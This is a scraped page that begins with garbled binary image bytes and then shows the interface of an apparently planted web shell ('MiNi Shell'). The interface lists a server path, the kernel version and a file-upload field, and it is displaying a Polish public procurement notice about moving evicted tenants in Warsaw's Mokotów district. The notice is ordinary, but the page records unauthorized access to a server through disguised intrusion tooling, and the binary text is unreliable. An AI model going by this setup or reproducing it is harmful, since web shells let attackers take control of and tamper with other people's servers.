JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220518/0016485301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzanie lokatorów eksmitowanych z lokali mieszkalnych stanowiących komunalny zasób miasta, położonych na terenie Dzielnicy Mokotów. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m.st. Warszawy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010858407</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Irysowa 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-660</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zgnmokotow.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgnmokotow.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzanie lokatorów eksmitowanych z lokali mieszkalnych stanowiących komunalny zasób miasta, położonych na terenie Dzielnicy Mokotów. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-55ce8e99-d684-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00164853</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00013704/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 TRANSPORT - PRZEPROWADZANIE LOKATORÓW EKSMITOWANYCH Z LOKALI MIESZKALNYCH STANOWIĄCYCH KOMUNALNY ZASÓB MIASTA</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zgnmokotow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja miedzy zamawiającym a<br/>wykonawcami odbywa się drogą elektroniczną przy użyciu systemu Marketplanet (https:/(oneplace.marketplanet.pl). Zamawiający<br/>nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, który<br/>został wskazany w SWZ.<br/>Pytania do SWZ należy zadawać za pośrednictwem systemu dostępnego pod adresem https://zgnmokotow.ezamawiajacy.pl,<br/>zwanego dalej systemem. Instrukcja korzystania z systemu jest dostępna pod wyżej wskazanym adresem w zakładce „Regulacje i<br/>procedury procesu zakupowego”<br/>Pozostałe informacje zawarte w SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oferta wraz ze stanowiącymi jej<br/>integralną część załącznikami musi być sporządzona przez Wykonawcę w języku polskim ściśle według postanowień SWZ.<br/>2. Oferta musi być sporządzona w postaci elektronicznej w formatach danych: .pdf, .doc, .docx, .rtf, .odt, .xls, .xlsx, XAdES i<br/>opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>3. Zamawiający dopuszcza następujący format przesyłanych dokumentów lub oświadczeń składanych jako elektroniczna kopia<br/>dokumentu: .pdf, .jpg, .tiff, XAdES.<br/>Zamawiający, określając dopuszczalne formaty danych w jakich Wykonawca może przedłożyć dokumenty lub oświadczenia,<br/>korzysta z katalogu formatów wskazanych w załączniku nr 2 do Rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w<br/>sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tj. Dz.U. z 2017, nr 2247).<br/>4. Zgodnie z art. 137 ust. 1 ustawy z dnia 5 września 2016 r. o usługach zaufania oraz identyfikacji elektronicznej (t. j. Dz. U. z 2021<br/>r. poz. 1797) do podpisywania ofert w systemie oraz plików dokumentów załączanych do oferty oraz pozostałych składanych<br/>postępowaniu rekomenduje się użycie kwalifikowanego podpisu elektronicznego wykorzystującego funkcję skrótu SHA-2.<br/>5. Sporządzenie i złożenie oferty wymaga rejestracji konta wykonawcy w systemie Marketplanet OnePlace<br/>(https:/(oneplace.marketplanet.pl). Czas weryfikacji danych od złożenia wniosku o rejestrację do aktywacji konta może wynosić do<br/>dwóch dni roboczych. Rejestracja konta wykonawcy nie stanowi zobowiązania do złożenia oferty. Po zarejestrowaniu i aktywacji<br/>konta wykonawca sporządza ofertę, którą należy opatrzyć i złożyć (wysłać) w systemie :<br/>- kwalifikowanym podpisem elektronicznym,<br/>- podpisem zaufanym,<br/>- podpisem osobistym,<br/>Wykonawca składa ofertę wraz z wymaganymi oświadczeniami i dokumentami. Wykonawca może złożyć jedną ofertę. Wykonawca<br/>może przed upływem terminu składania ofert zmienić lub wycofać ofertę.<br/>6. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego<br/>podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego.<br/>Pozostałe informacje zawarte w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny na podstawie art. 13 ust. 1 i 2<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz.UEL119z04.05.2016,str.1), dalej „RODO”.<br/>Pozostałe informacje zawarte w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TZ.PNK.260.10.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 54878,04 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonywanie usług transportowych polegających na przeprowadzaniu lokatorów<br/>eksmitowanych z lokali mieszkalnych stanowiących komunalny zasób miasta, położonych na terenie Dzielnicy Mokotów.<br/>W okresie od 1 kwietnia do 31 października w ciągu tego samego dnia wykonywanych jest do pięciu eksmisji, z tego<br/>co najmniej trzy w tym samym czasie. Wykonawca zobowiązany jest zapewnić transport i pracowników do wszystkich<br/>planowanych przeprowadzek, w tym do co najmniej trzech równocześnie.<br/>Część wielopiętrowych budynków mieszkalnych położonych na terenie<br/>Dzielnicy Mokotów nie ma wind. Oznacza to, że ruchomości, w tym meble, należy znieść po schodach.<br/>Większość budynków na Mokotowie jest własnością wspólnot mieszkaniowych<br/>– oznacza to, że należy dochować szczególnej staranności przy przeprowadzce z budynku bez windy, by nie zniszczyć<br/>klatek schodowych. Koszt naprawy uszkodzeń powstałych podczas przeprowadzki z winy pracowników wykonawcy –<br/>ponosi w całości Wykonawca.<br/>Usługa transportowa, będzie wykonywana sukcesywnie w miarę potrzeb licząc od dnia następującego po dniu<br/>podpisania umowy do dnia 31.12.2022 r. Warunki wykonania pojedynczej usługi transportowej będą określone przez<br/>Zamawiającego<br/>w poszczególnych zleceniach.<br/> Zamówienie płatne będzie na podstawie faktur VAT wystawianych przez Wykonawcę na jego rachunek bankowy w<br/>terminie 21 dni od daty złożenia faktury u Zamawiającego. Podstawę do wypłaty wynagrodzenia stanowić będzie (poza<br/>fakturą VAT) potwierdzone przez zamawiającego, zestawienie wykonanych usług transportowych.<br/> Podstawą obliczenia wartości poszczególnych zleceń - usług transportowych będzie cena jednostkowa zaoferowana<br/>w formularzu ofertowym przez Wykonawcę.<br/>Zlecenia, w oparciu o które wykonywane będą przeprowadzki, wydawane będą pisemnie Wykonawcy na co najmniej 5<br/>dni przed terminem przeprowadzki.<br/>W zleceniu, o którym mowa w pkt. 5.3. SWZ określony będzie adres lokalu, dzień i godzina przeprowadzki. Zlecenia<br/>będą przekazywane Wykonawcy telefonicznie lub e-mailem.<br/>Data i godzina przeprowadzki podana w zleceniu, o którym mowa w pkt. 5.3. niniejszej specyfikacji jest niezmienna.<br/>Zamawiający zastrzega sobie możliwość odwołania, w każdym czasie, przeprowadzki dotyczącej eksmisji.<br/>Zamawiający bezzwłocznie powiadomi Wykonawcę o odwołaniu przeprowadzki i nie będzie ponosił żadnych kosztów<br/>z tym związanych.<br/>Zamawiający planuje, że średni czas przeprowadzki będzie wynosił 4 godziny.<br/>W przypadkach przedłużenia czasu trwania przeprowadzki powyżej 4 godzin Zamawiający zapłaci tylko ryczałtową<br/>cenę określoną przez Wykonawcę<br/>w Formularzu oferty.<br/>Z 15-to letniego doświadczenia Zamawiającego w wykonywaniu eksmisji wynika, że 85 % przeprowadzek trwa do 4<br/>godzin, 10 % przeprowadzek trwa do 1 godziny,<br/>5 % przeprowadzek trwa powyżej 4 godzin.<br/>W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do wyniesienia<br/>z mieszkań całego, wskazanego przez lokatora mieszkania lub komornika, wyposażenia (mebli, sprzętu AGD, RTV,) oraz<br/>rzeczy osobistych lokatorów, zapakowania ich, załadunku na samochody (meblowozy lub inne samochody<br/>z zadaszeniem), przewiezienia do nowego budynku, rozładowania i wniesienia do wskazanego mieszkania.<br/>W ramach wykonania zamówienia Wykonawca zobowiązany będzie między innymi do:<br/> przygotowania i wykonania przeniesienia dłużnika wraz ze wskazanymi przez niego ruchomościami do lokalu, który<br/>ma objąć,<br/>przygotowania przeprowadzki – demontaż wszelkiej zabudowy, przede wszystkim: kuchni, przedpokoju, łazienki;<br/>demontaż oświetlenia, karniszy, pawlaczy. Wypakowanie szaf, schowków, regałów, bibliotek a następnie ich<br/>rozmontowanie. Zapakowanie wszystkich, wskazanych przez dłużnika (lub przez komornika) ruchomości do odpowiednich<br/>pojemników, odpowiednie zabezpieczenie i zapakowanie przedmiotów ze szkła i innych łatwo tłukących się.<br/>wykonania przeprowadzki – po odpowiednim zapakowaniu i zabezpieczeniu –wyniesienie wszystkich wskazanych<br/>przez dłużnika lub wskazanych przez komornika ruchomości do samochodów służących do przeprowadzki. Przewiezienie<br/>ruchomości pod adres wskazany przez wierzyciela, zaniesienie ruchomości do wskazanego lokalu (bez rozpakowywania).<br/>5.5.3. zapewnienia we własnym zakresie pojemników niezbędnych do właściwego<br/>i bezpiecznego przewiezienia ruchomości dłużnika – pudła, pojemniki, worki. Pracownicy muszą posiadać odpowiedni sprzęt<br/>do przenoszenia mebli – pasy, wózki. Pracownicy przewoźnika muszą posiadać umiejętności oraz posiadać sprzęt do<br/>właściwego demontażu.<br/>6. Wykonawca zobowiązany będzie do zatrudnienia na podstawie umowy o pracę,<br/>w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (t.j. Dz.U. z 2020 r., poz. 1320 ze zm.),<br/>wszystkich osób wykonujących czynności w zakresie wykonania przedmiotu zamówienia. Obowiązek, o którym mowa w<br/>zdaniu pierwszym dotyczy również podwykonawców realizujących zamówienie, na zasoby których Wykonawca się powołuje<br/>oraz innych podmiotów uczestniczących w wykonaniu zamówienia, na zasoby których Wykonawca się powołuje.<br/>7. Wykonawca, każdorazowo na żądanie Zamawiającego, w terminie wskazanym przez Zamawiającego, nie krótszym niż<br/>3 dni robocze, zobowiązany jest do przedłożenia do wglądu kopie umów o pracę, zawierających jedynie imię i nazwisko<br/>pracownika, rodzaj umowy, datę zawarcia umowy, okres obowiązywania umowy i wymiar etatu - zawartych przez<br/>Wykonawcę z Pracownikami.<br/>8. Za ewentualne szkody powstałe podczas wykonywania przedmiotu zamówienia, bądź będące wynikiem niewykonania<br/>lub nienależytego wykonania przedmiotu zamówienia, całkowitą odpowiedzialność cywilnoprawną w stosunku do<br/>Zamawiającego i osób trzecich ponosi Wykonawca.<br/>9. Czynności, o których mowa w pkt. 5. specyfikacji warunków zamówienia, mają być wykonane zgodnie z warunkami<br/>wynikającymi z Postanowień umowy stanowiących Rozdział III specyfikacji warunków zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje możliwość udzielenia zamówień podobnych, o których mowa w art. 214 ust. 1 pkt. 7 ustawy PZP. Zakres ewentualnych<br/>zamówień podobnych może obejmować wykonywanie usług polegających na wykonywaniu usług transportowych w przedmiocie<br/>zamówienia. Wartość szacunkowa zamówienia może wynieść do 50% zamówienia podstawowego. Wykonawca będzie wykonywał<br/>zamówienie należycie i bez zbędnej zwłoki na warunkach określonych<br/>w umowie podstawowej. Ceny będą podlegały negocjacjom. Wartość zamówień podobnych została wkalkulowana przy szacowaniu<br/>wartości zamówienia</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>nie podlegają wykluczeniu na podstawie art. 108 ust.1 i 109 ust.1 pkt.4 ,<br/>spełniają warunki udziału w postępowaniu dotyczące:<br/>1. zdolności do występowania w obrocie gospodarczym:<br/>w celu stwierdzenia braku podstaw wykluczenia wykonawca winien wykazać się posiadaniem odpisu lub informacji z<br/>Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art.109 ust.1<br/>pkt. 4 ustawy,<br/>2. uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to<br/>z odrębnych przepisów: nie dotyczy w przedmiotowym postępowaniu.<br/>3. sytuacji ekonomicznej lub finansowej :<br/>W celu wykazania spełnienia warunku posiadania sytuacji ekonomicznej<br/>i finansowej zapewniającej wykonanie zamówienia Wykonawca winien wykazać się posiadaniem dokumentu<br/>potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia w wysokość sumy gwarancyjnej nie mniejszej niż 20.000,00 zł.<br/>4. zdolności technicznej lub zawodowej:<br/>W celu wykazania spełnienia warunku zdolności technicznej lub zawodowej zapewniającej wykonanie zamówienia<br/>wykonawca winien wykazać, że:<br/>4.1. wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, usługi<br/>odpowiadające swoim przedmiotem przedmiotowi zamówienia tj. wykonał usługi polegające na wykonaniu przeprowadzek<br/>lub opróżniania lokali mieszkalnych lub użytkowych<br/>o łącznej wartości w ciągu tych lat nie mniejszej niż 30.000,00 - zł brutto przy czym w przypadku świadczeń okresowych lub<br/>ciągłych wykonawca musi wykazać wykonanie części usług, o których mowa wyżej,<br/>o wartości nie mniejszej niż: 30.000,00 zł brutto).<br/>4.2.dysponuje minimum 2 osobami, które będą uczestniczyć wykonywaniu zamówienia, posiadającymi stosowne<br/>doświadczenie w wykonywaniu usługi polegającej na wykonaniu przeprowadzek lub opróżniania lokali mieszkalnych lub<br/>użytkowych. Osoby, o których mowa w zdaniu pierwszym Wykonawca musi mieć zatrudnione na podstawie umowy<br/>o pracę, w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2020 r., poz. 1320 z późn.<br/>zm.).<br/>2. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów i oświadczeń<br/>złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.<br/>3. W przypadku wspólnego ubiegania się o zamówienie Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są do łącznego spełnienia takich samych<br/>warunków udziału w postępowaniu o udzielenie zamówienia, jak wykonawcy występujący samodzielnie tj: przy ocenie<br/>spełnienia warunków, o których mowa w art. 112 ustawy, zamawiający będzie brał pod uwagę łączny potencjał techniczny i<br/>kadrowy wykonawców, ich łączne kwalifikacje oraz łączną sytuację ekonomiczną i finansową przy czym:<br/>3.1.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki, o których mowa w pkt. 22.1.3.<br/>SWZ, zostaną spełnione wyłącznie wtedy gdy jeden z Wykonawców będzie posiadał dokument potwierdzający<br/>ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w<br/>pełnej wysokości sumy gwarancyjnej wymaganej przez Zamawiającego w pkt. 22.1.3. SWZ.<br/>3.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki, o których mowa w pkt.<br/>22.1.4.1. SWZ, zostaną spełnione wyłącznie wtedy gdy jeden z Wykonawców wykaże się wykonaniem usług wymaganych<br/>zgodnie z postanowieniem pkt. 22.1.4.1. SWZ, samodzielnie. Za spełnienie warunku nie będzie uznane wykazanie, że np.<br/>„Wykonawca A” wykonał usługi o wartości 15.000,00 zł,<br/>a „Wykonawca B” wykonał usługi o wartości 15.000,00 zł.<br/>Pozostałe zawarte w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie<br/>z art. 274 ust. 1 ustawy Prawo Zamówień Publicznych, Zamawiający przed udzieleniem zamówienia, wezwie wykonawcę (lub<br/>wykonawców), którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż<br/>5 dni, od dnia wezwania podmiotowych środków dowodowych aktualnych na dzień ich złożenia:<br/>23.1.1. wykazu usług, o których mowa w pkt. 22.1.4.1. SWZ 